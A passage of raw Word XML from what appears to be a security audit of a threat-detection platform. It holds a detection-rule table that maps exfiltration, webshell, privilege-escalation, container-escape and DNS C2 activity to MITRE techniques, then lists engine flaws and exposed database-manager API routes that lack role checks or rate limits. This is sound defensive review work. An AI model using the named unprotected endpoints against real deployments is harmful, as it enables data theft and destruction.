      <w:tr w:rsidR="00FA1094" w14:paraId="67B9FD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BDEBB08" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>15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ABA12D4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Staged Exfiltration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F70F83A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Archive sensitive → transfer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BEF9F2A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>30min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2B9DCC8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1560.001, T1048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F57CC48" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>PROCESS+FLOW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644C804" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="62C2F3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53DD163" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>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F96B948" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>DNS Exfiltration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44EAB5E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>≥100 DNS queries at &gt;10/s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910EF11" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Single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9B048AD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1048.003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AE0E519" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>FLOW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0C1B82A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="2350DA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BF34B15" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>17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F944D27" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Binary Replacement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760B9FF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>FIM: critical binary modified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4CC239C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Single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67EE572" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1014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D353516" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SECURITY(FIM)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D424B55" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="3DBBF7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FDBBD50" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>18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BFA8B37" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SUID Privilege Escalation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5BB9F10" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>FIM: new SUID bit set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9D1F9BB" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Single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76681BC" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1548.001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28BB416" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SECURITY(FIM)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488589A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="72DC8C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F005AF2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>19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BADF7D6" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Webshell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Deployment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C09CB98" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>FIM: .</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jsp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in web root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ED473FC" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Single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7728EB9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1505.003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0DA1291" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SECURITY(FIM)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90729D5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="0E0B16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1F76C02" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>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BF742CB" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>DNS C2 Beaconing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7CA5D2F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>DNS_THREAT with C2_BEACON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9659C14" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Single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A219A75" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1071.004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62F699F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SECURITY(DNS)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3F3E0FD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="788EBA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A78E4AA" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>21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AE9396D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>DGA Malware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04D0B7A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>≥3 DNS_THREAT with DGA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6BE0AFA" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Single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3B819D8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1568.002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8C46B6D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SECURITY(DNS)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25A2D76" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="654B73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6A4B16B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>22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73721A0" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Kernel Priv Escalation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911C31B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>KERNEL_THREAT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9769D54" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Single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67E7409" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1068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C3652E9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SECURITY(Kernel)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B17A616" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="0D0400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AAD43CB" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>23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40E93E6" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Container Escape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E4C872B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>KERNEL_THREAT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8EA4155" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Single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DD92302" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1611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E20E85B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SECURITY(Kernel)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F7EC2CE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="7044AB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DA15E85" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>24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2B3FE6A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Process Injection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E340A24" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>KERNEL_THREAT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D75D48E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Single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C681E62" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1055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162646D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SECURITY(Kernel)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6B386BC" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="187BE7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57AA301" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>25-26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CCC15C9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Reserve for fusion rules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C6C913E" w14:textId="77777777" w:rsidR="00FA1094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C0CCD77" w14:textId="77777777" w:rsidR="00FA1094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233352F" w14:textId="77777777" w:rsidR="00FA1094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18C1595" w14:textId="77777777" w:rsidR="00FA1094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624AFE0" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="646A7CF7" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6449024B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 Execution Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE9ED08" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Evaluation: Sequential, first-match short-circuits (DESIGN FLAW — misses multi-stage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C373A6D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Statefulness</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: All rules stateless (examine time window only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC93E5D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Time windows: Hardcoded (5/10/15/30 min), not configurable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6A5CAA" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Scoring: Base 10 + CRITICAL(+40) + HIGH(+20) + MEDIUM(+10), cap 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6771A84B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>No cross-device correlation (per-device only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E522A7A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>No delayed event recovery (&gt;30 min = lost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01344D03" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E7B1287" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 MITRE Coverage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6282A5DA" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>37 unique techniques across 10 of 14 tactics. Missing: Reconnaissance, Resource Development, Impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49217536" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239A6A5E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>5.4 Critical Gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EF5224" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G14: 19/26 rules UNTESTED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792F1F8B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G15: Short-circuit evaluation (first match only, misses multi-stage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDA0A10" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G16: No cross-device correlation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC0D751" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G17: Hardcoded time windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2310E730" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G18: No delayed event recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A81EF15" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G19: Missing Impact tactic coverage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BDDFE1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2042A01E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094"/>
    <w:p w14:paraId="37056F86" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>PHASE 6 — CORTEX / WEB LAYER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66942C3D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 API Surface Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7201B7" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>219 total routes. Key categories:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B8B659" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>Auth: 15 endpoints (session + JWT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E38719D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>Agent management: 12 endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166B627D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>Event APIs: 6 endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AE0FB5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>Dashboard real-time: 20+ polling endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209D525F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>Database manager: 9 endpoints (CRITICAL exposure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6DC227" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>WebSocket: 5 event handlers, broadcasts every 5s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BE427C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1509739B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A4ABA5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/database-manager/view-table/&lt;name&gt;: Raw table data, any authenticated user (NO role check)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1659A479" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/database-manager/export/&lt;name&gt;: Full CSV export</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08076D08" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/database-manager/truncate-table/&lt;name&gt;: Delete table (NO rate limit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEE92CA" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/telemetry/recent: Raw WAL telemetry (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>protobuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> decoded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8222C8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>/dashboard/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/correlate: Full event correlation chain reconstruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017D0C81" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>WebSocket: All threat data broadcast to every connected user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35556D08" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2944A047" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>6.3 Integrity Surface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C59700" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Hash chain NOT exposed to UI (no hash fields in API responses)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3EBCF8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence chain reconstruction based on event data only (no cryptographic proof)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E44FC9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Incident state changes have no user attribution or signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D595C1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>No mechanism to verify event authenticity from the dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDEEEBF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C79E2DC" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>6.4 Critical Gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B010B15" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G20: Database manager has NO role-based access control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0212F375" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G21: No rate limiting on destructive database operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C128647" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G22: No hash chain verification exposed to Cortex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB6232A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G23: Incident state changes have no audit trail of who changed them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6FFD24" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>G24: WebSocket broadcasts all data to all authenticated users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764F23B8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="551A3B49" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094"/>
    <w:p w14:paraId="6A613982" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 7 — GOLDEN ATTACK SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE80FD6" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Scenario Alpha: SSH Brute Force → Discovery → Persistence → Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B455E4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
